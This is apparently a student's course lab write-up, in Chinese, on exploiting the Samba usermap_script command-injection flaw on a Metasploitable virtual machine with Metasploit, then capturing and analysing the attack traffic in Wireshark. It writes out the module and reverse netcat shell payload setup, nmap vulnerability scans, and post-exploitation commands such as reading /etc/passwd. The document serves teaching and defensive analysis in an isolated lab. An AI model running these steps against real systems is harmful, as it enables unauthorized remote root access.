ybh724

导航

20251906 2025-2026-2 《网络攻防实践》第七周作业

1.实践内容

(1)使用Metasploit进行Linux远程渗透攻击
任务:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。实践步骤如下:
①启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一;
②使用exploit:exploit/multi/samba/usermap_script渗透攻击模块;
③选择攻击PAYLOAD为远程shell,(正向或反向连接均可);
④设置渗透攻击参数(RHOST,LHOST,TARGET等);
⑤执行渗透攻击;
⑥查看是否正确得到远程Shell,并查看获得的权限。
(2)实践作业:攻防对抗实践
攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。
防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。

2.实践过程

2.1 使用Metasploit进行Linux远程渗透攻击

攻击机kali的ip地址为192.168.200.64
6c60aa4089717e44508a4e3ad8205f70
靶机Metasploitable的ip地址为192.168.200.65
7d50ff5a4a618849efba6056f61dc53c
两台虚拟机均配置为NAT模式,处于同一网段,网络互通正常
f5484efd7de3801a1920d4701b23958b
使用命令msfconsole启动Metasploit
使用命令search usermap_script搜索Samba usermap_script漏洞对应的攻击模块
结果显示存在一个匹配的模块exploit/multi/samba/usermap_script,该模块利用Samba服务中用户名映射脚本的命令注入漏洞,可执行任意系统命令
使用命令use exploit/multi/samba/usermap_script使用该模块
使用命令show payloads显示该模块支持的所有载荷
使用set payload cmd/unix/reverse_netcat设置反向连接载荷cmd/unix/reverse_netcat
de8dee0be26648f201beed97734c846d
设置靶机地址set RHOST 192.168.200.65
设置攻击机地址set LHOST 192.168.200.64
使用show options查看所有配置参数确认无误
9b24b62468a48fe6c1229bf3520d5b5b
使用exploit执行攻击
973124e229c6fc91b4e84c98168510d0
在获取的shell中执行命令,验证获得的权限级别和系统信息
whoami
id
ifconfig
8efbe5ff233c25205e971400a9d58c17
ls
47c5659cc7ecdd765b522813176cfdf5
touch attcak_text.txt
ls -l
f8459777601fb45b805f5a6dc382934c
cat /etc/passwd
bbf0ef71d8666162921e892948e4a024
执行结果显示,成功获得了靶机的root最高权限,可以执行任意系统命令、创建和修改文件

2.2 攻防对抗实践

使用nmap -sV 192.168.200.65扫描目标主机的开放端口与版本号等信息
cbd7aff1e5df21d0f065dad9a50aeb42
使用nmap -p 139,445 --script smb-vuln* 192.168.200.65扫描目标主机存在的漏洞
ca56f2c28690985447deaa0973a3e66e
使用nmap -p 139,445 -sV 192.168.200.65获取SMB服务版本
2d070f75ff587ddf8d7ba43936034a88
显示目标主机的139和445端口均处于开放状态,运行的是Samba smbd 3.X-4.X版本服务,该版本范围包含本次实验所利用的Usermap_script漏洞(CVE-2007-2447)的受影响版本,验证了攻击的可行性
在执行攻击前,新开一个kali终端,使用sudo tcpdump -i eth0 host 192.168.200.65 -w samba_attack.pcap捕获流量
攻击全部完成后,在抓包终端按下Ctrl+C停止抓包。共捕获42个数据包,无丢包,数据包文件samba_attack.pcap保存在Kali的home目录中
cd4851ee8373fc148db26e73bbb32ec9
在wireshark打开捕获的samba_attack.pcap文件,在顶部过滤栏输入ip.addr == 192.168.200.64 && ip.addr == 192.168.200.65,只显示攻击机与靶机之间的流量
91cc36f827735cfa9a5e1f43715f399e
追踪TCP流1,可以看到完整的攻击交互过程
29e06e42e990d46465d51f49bf623c0e

3.学习中遇到的问题及解决

  • 问题1:攻击时靶机的端口拒绝了回复
  • 问题1解决方案:靶机的smb服务默认关闭,需要手动开启

4.实践总结

本次实验通过msfconsole完成了对Metasploitable靶机Samba Usermap_script漏洞的渗透攻击,熟练掌握了漏洞模块加载、载荷选择、参数配置及攻击执行的完整流程,成功获取目标主机root权限远程Shell。在实操中直观理解了该命令注入漏洞的成因与危害,清晰区分了SMB漏洞与Samba具体漏洞的包含关系,加深了对Linux环境下SMB服务安全风险的认识。

posted on 2026-05-07 10:51  闫炳宏  阅读(7)  评论(0)    收藏  举报